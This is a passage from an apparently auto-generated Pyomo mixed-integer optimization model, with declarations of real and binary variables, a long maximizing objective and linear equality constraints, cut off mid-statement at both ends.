Var(within=Reals,bounds=(0,None),initialize=0) m.x1467 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1468 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1469 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1470 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1471 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1472 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1473 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1474 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1475 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1476 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1477 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1478 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1479 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1480 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1481 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1482 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1483 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1484 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1485 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1486 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1487 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1488 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1489 = Var(within=Reals,bounds=(0,None),initialize=0) m.b1490 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1491 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1492 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1493 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1494 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1495 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1496 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1497 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1498 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1499 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1500 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1501 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1502 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1503 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1504 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1505 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1506 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1507 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1508 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1509 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1510 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1511 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1512 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1513 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1514 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1515 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1516 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1517 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1518 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1519 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1520 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1521 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1522 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1523 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1524 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1525 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1526 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1527 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1528 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1529 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1530 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1531 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1532 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1533 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1534 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1535 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1536 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1537 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1538 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1539 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1540 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1541 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1542 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1543 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1544 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1545 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1546 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1547 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1548 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1549 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1550 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1551 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1552 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1553 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1554 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1555 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1556 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1557 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1558 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1559 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1560 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1561 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1562 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1563 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1564 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1565 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1566 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1567 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1568 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1569 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1570 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1571 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1572 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1573 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1574 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1575 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1576 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1577 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1578 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1579 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1580 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1581 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1582 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1583 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1584 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1585 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1586 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1587 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1588 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1589 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1590 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1591 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1592 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1593 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1594 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1595 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1596 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1597 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1598 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1599 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1600 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1601 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1602 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1603 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1604 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1605 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1606 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1607 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1608 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1609 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1610 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1611 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1612 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1613 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1614 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1615 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1616 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1617 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1618 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1619 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1620 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1621 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1622 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1623 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1624 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1625 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1626 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1627 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1628 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1629 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1630 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1631 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1632 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1633 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1634 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1635 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1636 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1637 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1638 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1639 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1640 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1641 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1642 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1643 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1644 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1645 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1646 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1647 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1648 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1649 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1650 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1651 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1652 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1653 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1654 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1655 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1656 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1657 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1658 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1659 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1660 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1661 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1662 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1663 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1664 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1665 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1666 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1667 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1668 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1669 = Var(within=Binary,bounds=(0,1),initialize=0) m.x1670 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1671 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1672 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1673 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1674 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1675 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1676 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1677 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1678 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1679 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1680 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1681 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1682 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1683 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1684 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1685 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1686 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1687 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1688 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1689 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1690 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1691 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1692 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1693 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1694 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1695 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1696 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1697 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1698 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1699 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1700 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1701 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1702 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1703 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1704 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1705 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1706 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1707 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1708 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1709 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1710 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1711 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1712 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1713 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1714 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1715 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1716 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1717 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1718 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1719 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1720 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1721 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1722 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1723 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1724 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1725 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1726 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1727 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1728 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1729 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1730 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1731 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1732 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1733 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1734 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1735 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1736 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1737 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1738 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1739 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1740 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1741 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1742 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1743 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1744 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1745 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1746 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1747 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1748 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1749 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1750 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1751 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1752 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1753 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1754 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1755 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1756 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1757 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1758 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1759 = Var(within=Reals,bounds=(None,None),initialize=0) m.obj = Objective(expr= - 20*m.x2 - 17*m.x3 - 15*m.x4 - 20*m.x17 - 21*m.x18 - 19*m.x19 - 18*m.x29 - 20*m.x30 - 20*m.x31 - 16*m.x65 - 19*m.x66 - 17*m.x67 + 26*m.x77 + 31*m.x78 + 31*m.x79 + 30*m.x83 + 29*m.x84 + 37*m.x85 - 20*m.x86 - 18*m.x87 - 21*m.x88 + 2*m.x95 + 2*m.x96 + 2*m.x97 + 3*m.x98 + 2*m.x99 + 2*m.x100 + 3*m.x101 + 3*m.x102 + 3*m.x103 + 2*m.x104 + 2*m.x105 + 2*m.x106 - 6*m.b803 - 4*m.b804 - 3*m.b805 - 40*m.b806 - 35*m.b807 - 20*m.b808 - 46*m.b809 - 39*m.b810 - 23*m.b811 - 7*m.b815 - 4*m.b816 - 4*m.b817 - 30*m.b818 - 25*m.b819 - 20*m.b820 - 37*m.b821 - 29*m.b822 - 22*m.b823 - 7*m.b827 - 5*m.b828 - 3*m.b829 - 15*m.b830 - 5*m.b831 - 2*m.b832 - 22*m.b833 - 10*m.b834 - 5*m.b835 - 11*m.b839 - 8*m.b840 - 6*m.b841 - 13*m.b842 - 8*m.b843 - 3*m.b844 - 24*m.b845 - 16*m.b846 - 9*m.b847 - 10*m.b851 - 7*m.b852 - 6*m.b853 - 13*m.b854 - 8*m.b855 - 3*m.b856 - 23*m.b857 - 15*m.b858 - 9*m.b859 - 9*m.b863 - 9*m.b864 - 7*m.b865 - 30*m.b866 - 30*m.b867 - 25*m.b868 - 39*m.b869 - 39*m.b870 - 32*m.b871 - 8*m.b875 - 7*m.b876 - 7*m.b877 - 20*m.b878 - 15*m.b879 - 10*m.b880 - 28*m.b881 - 22*m.b882 - 17*m.b883 - 8*m.b887 - 6*m.b888 - 5*m.b889 - 15*m.b890 - 10*m.b891 - 6*m.b892 - 23*m.b893 - 16*m.b894 - 11*m.b895 - m.x896 - m.x897 - m.x898 + 5*m.x914 + 10*m.x915 + 5*m.x916 - 2*m.x929 - m.x930 - 2*m.x931 - 10*m.x980 - 5*m.x981 - 5*m.x982 - 5*m.x983 - 5*m.x984 - 5*m.x985 + 40*m.x1004 + 30*m.x1005 + 15*m.x1006 + 15*m.x1007 + 20*m.x1008 + 25*m.x1009 + 10*m.x1010 + 30*m.x1011 + 40*m.x1012 + 30*m.x1013 + 20*m.x1014 + 20*m.x1015 + 35*m.x1016 + 50*m.x1017 + 20*m.x1018 + 20*m.x1019 + 30*m.x1020 + 35*m.x1021 + 25*m.x1022 + 50*m.x1023 + 10*m.x1024 + 15*m.x1025 + 20*m.x1026 + 20*m.x1027 + 30*m.x1049 + 40*m.x1050 + 40*m.x1051 - m.x1064 - m.x1065 - m.x1066 + 80*m.x1088 + 90*m.x1089 + 120*m.x1090 + 285*m.x1091 + 390*m.x1092 + 350*m.x1093 + 290*m.x1094 + 405*m.x1095 + 190*m.x1096 + 280*m.x1097 + 400*m.x1098 + 430*m.x1099 + 290*m.x1100 + 300*m.x1101 + 240*m.x1102 + 350*m.x1103 + 250*m.x1104 + 300*m.x1105 - 5*m.b1580 - 4*m.b1581 - 6*m.b1582 - 8*m.b1583 - 7*m.b1584 - 6*m.b1585 - 6*m.b1586 - 9*m.b1587 - 4*m.b1588 - 10*m.b1589 - 9*m.b1590 - 5*m.b1591 - 6*m.b1592 - 10*m.b1593 - 6*m.b1594 - 7*m.b1595 - 7*m.b1596 - 4*m.b1597 - 4*m.b1598 - 3*m.b1599 - 2*m.b1600 - 5*m.b1601 - 6*m.b1602 - 7*m.b1603 - 2*m.b1604 - 5*m.b1605 - 2*m.b1606 - 4*m.b1607 - 7*m.b1608 - 4*m.b1609 - 3*m.b1610 - 9*m.b1611 - 3*m.b1612 - 7*m.b1613 - 2*m.b1614 - 9*m.b1615 - 3*m.b1616 - m.b1617 - 9*m.b1618 - 2*m.b1619 - 6*m.b1620 - 3*m.b1621 - 4*m.b1622 - 8*m.b1623 - m.b1624 - 2*m.b1625 - 5*m.b1626 - 2*m.b1627 - 3*m.b1628 - 4*m.b1629 - 3*m.b1630 - 5*m.b1631 - 7*m.b1632 - 6*m.b1633 - 2*m.b1634 - 8*m.b1635 - 4*m.b1636 - m.b1637 - 4*m.b1638 - m.b1639 - 2*m.b1640 - 5*m.b1641 - 2*m.b1642 - 9*m.b1643 - 2*m.b1644 - 9*m.b1645 - 5*m.b1646 - 8*m.b1647 - 4*m.b1648 - 2*m.b1649 - 3*m.b1650 - 8*m.b1651 - 10*m.b1652 - 6*m.b1653 - 3*m.b1654 - 4*m.b1655 - 8*m.b1656 - 7*m.b1657 - 7*m.b1658 - 3*m.b1659 - 9*m.b1660 - 4*m.b1661 - 8*m.b1662 - 6*m.b1663 - 2*m.b1664 - m.b1665 - 3*m.b1666 - 8*m.b1667 - 3*m.b1668 - 4*m.b1669 , sense=maximize) m.c2 = Constraint(expr= m.x2 - 0.2*m.x107 == 0) m.c3 = Constraint(expr= m.x3 - 0.2*m.x108 == 0) m.c4 = Constraint(expr= m.x4 - 0.2*m.x109 == 0) m.c5 = Constraint(expr= m.x5 - 0.2*m.x110 == 0) m.c6 = Constraint(expr= m.x6 - 0.2*m.x111 == 0) m.c7 = Constraint(expr= m.x7 - 0.2*m.x112 == 0) m.c8 = Constraint(expr= m.x8 - 0.2*m.x113 == 0) m.c9 = Constraint(expr= m.x9 - 0.2*m.x114 == 0) m.c10 = Constraint(expr= m.x10 - 0.2*m.x115 == 0) m.c11 = Constraint(expr= m.x11 - 0.2*m.x116 == 0) m.c12 = Constraint(expr= m.x12 - 0.2*m.x117 == 0) m.c13 = Constraint(expr= m.x13 - 0.2*m.x118 == 0) m.c14 = Constraint(expr= m.x14 - 0.2*m.x119 == 0) m.c15 = Constraint(expr= m.x15 - 0.2*m.x120 == 0) m.c16 = Constraint(expr= m.x16 - 0.2*m.x121 == 0) m.c17 = Constraint(expr= m.x17 - 0.5*m.x122 == 0) m.c18 = Constraint(expr= m.x18 - 0.5*m.x123 == 0) m.c19 = Constraint(expr= m.x19 - 0.5*m.x124 == 0) m.c20 = Constraint(expr= m.x20 - 0.5*m.x125 == 0) m.c21 = Constraint(expr= m.x21 - 0.5*m.x126 == 0) m.c22 = Constraint(expr= m.x22 - 0.5*m.x127 == 0) m.c23 = Constraint(expr= m.x23 - 0.7*m.x128 == 0) m.c24 = Constraint(expr= m.x24 - 0.7*m.x129 == 0) m.c25 = Constraint(expr= m.x25 - 0.7*m.x130 == 0) m.c26 = Constraint(expr= m.x26 - 0.7*m.x131 == 0) m.c27 = Constraint(expr= m.x27 - 0.7*m.x132 == 0) m.c28 = Constraint(expr= m.x28 - 0.7*m.x133 == 0) m.c29 = Constraint(expr= m.x29 - 1.2*m.x134 == 0) m.c30 = Constraint(expr= m.x30 - 1.2*m.x135 == 0) m.c31 = Constraint(expr= m.x31 - 1.2*m.x136 == 0) m.c32 = Constraint(expr= m.x32 - 1.2*m.x137 == 0) m.c33 = Constraint(expr= m.x33 - 1.2*m.x138 == 0) m.c34 = Constraint(expr= m.x34 - 1.2*m.x139 == 0) m.c35 = Constraint(expr= m.x35 - 0.5*m.x140 == 0) m.c36 = Constraint(expr= m.x36 - 0.5*m.x141 == 0) m.c37 = Constraint(expr= m.x37 - 0.5*m.x142 == 0) m.c38 = Constraint(expr= m.x38 - 0.7*m.x143 == 0) m.c39 = Constraint(expr= m.x39 - 0.7*m.x144 == 0) m.c40 = Constraint(expr= m.x40 - 0.7*m.x145 == 0) m.c41 = Constraint(expr= m.x41 - 1.2*m.x146 == 0) m.c42 = Constraint(expr= m.x42 - 1.2*m.x147 == 0) m.c43 = Constraint(expr= m.x43 - 1.2*m.x148 == 0) m.c44 = Constraint(expr= m.x44 - 1.2*m.x149 == 0) m.c45 = Constraint(expr= m.x45 - 1.2*m.x150 == 0) m.c46 = Constraint(expr= m.x46 - 1.2*m.x151 == 0) m.c47 = Constraint(expr= m.x47 - 1.2*m.x152 == 0) m.c48 = Constraint(expr= m.x48 - 1.2*m.x153 == 0) m.c49 = Constraint(expr= m.x49 - 1.2*m.x154 == 0) m.c50 = Constraint(expr= m.x50 - 1.2*m.x155 == 0) m.c51 = Constraint(expr= m.x51 - 1.2*m.x156 == 0) m.c52 = Constraint(expr= m.x52 - 1.2*m.x157 == 0) m.c53 = Constraint(expr= m.x53 - 0.3*m.x158 == 0) m.c54 = Constraint(expr= m.x54 - 0.3*m.x159 == 0) m.c55 = Constraint(expr= m.x55 - 0.3*m.x160 == 0) m.c56 = Constraint(expr= m.x56 - 0.9*m.x161 == 0) m.c57 = Constraint(expr= m.x57 - 0.9*m.x162 == 0) m.c58 = Constraint(expr= m.x58 - 0.9*m.x163 == 0) m.c59 = Constraint(expr= m.x59 - 0.3*m.x164 == 0) m.c60 = Constraint(expr= m.x60 - 0.3*m.x165 == 0) m.c61 = Constraint(expr= m.x61 - 0.3*m.x166 == 0) m.c62 = Constraint(expr= m.x62 - 0.9*m.x167 == 0) m.c63 = Constraint(expr= m.x63 - 0.9*m.x168 == 0) m.c64 = Constraint(expr= m.x64 - 0.9*m.x169 == 0) m.c65 = Constraint(expr= m.x65 - 0.4*m.x170 == 0) m.c66 = Constraint(expr= m.x66 - 0.4*m.x171 == 0) m.c67 = Constraint(expr= m.x67 - 0.4*m.x172 == 0) m.c68 = Constraint(expr= m.x68 - 0.4*m.x173 == 0) m.c69 = Constraint(expr= m.x69 - 0.4*m.x174 == 0) m.c70 = Constraint(expr= m.x70 - 0.4*m.x175 == 0) m.c71 = Constraint(expr= m.x71 - 0.4*m.x176 == 0) m.c72 = Constraint(expr= m.x72 - 0.4*m.x177 == 0) m.c73 = Constraint(expr= m.x73 - 0.4*m.x178 == 0) m.c74 = Constraint(expr= m.x74 - 1.6*m.x179 == 0) m.c75 = Constraint(expr= m.x75 - 1.6*m.x180 == 0) m.c76 = Constraint(expr= m.x76 - 1.6*m.x181 == 0) m.c77 = Constraint(expr= m.x77 - 1.6*m.x182 == 0) m.c78 = Constraint(expr= m.x78 - 1.6*m.x183 == 0) m.c79 = Constraint(expr= m.x79 - 1.6*m.x184 == 0) m.c80 = Constraint(expr= m.x80 - 1.1*m.x185 == 0) m.c81 = Constraint(expr= m.x81 - 1.1*m.x186 == 0) m.c82 = Constraint(expr= m.x82 - 1.1*m.x187 == 0) m.c83 = Constraint(expr= m.x83 - 1.1*m.x188 == 0) m.c84 = Constraint(expr= m.x84 - 1.1*m.x189 == 0) m.c85 = Constraint(expr= m.x85 - 1.1*m.x190 == 0) m.c86 = Constraint(expr= m.x86 - 0.7*m.x191 == 0) m.c87 = Constraint(expr= m.x87 - 0.7*m.x192 == 0) m.c88 = Constraint(expr= m.x88 - 0.7*m.x193 == 0) m.c89 = Constraint(expr= m.x89 - 0.7*m.x194 == 0) m.c90 = Constraint(expr= m.x90 - 0.7*m.x195 == 0) m.c91 = Constraint(expr= m.x91 - 0.7*m.x196 == 0) m.c92 = Constraint(expr= m.x92 - 0.7*m.x197 == 0) m.c93 = Constraint(expr= m.x93 - 0.7*m.x198 == 0) m.c94 = Constraint(expr= m.x94 - 0.7*m.x199 == 0) m.c95 = Constraint(expr= m.x95 - 0.2*m.x200 == 0) m.c96 = Constraint(expr= m.x96 - 0.2*m.x201 == 0) m.c97 = Constraint(expr= m.x97 - 0.2*m.x202 == 0) m.c98 = Constraint(expr= m.x98 - 0.7*m.x203 == 0) m.c99 = Constraint(expr= m.x99 - 0.7*m.x204 == 0) m.c100 = Constraint(expr= m.x100 - 0.7*m.x205 == 0) m.c101 = Constraint(expr= m.x101 - 0.3*m.x206 == 0) m.c102 = Constraint(expr= m.x102 - 0.3*m.x207 == 0) m.c103 = Constraint(expr= 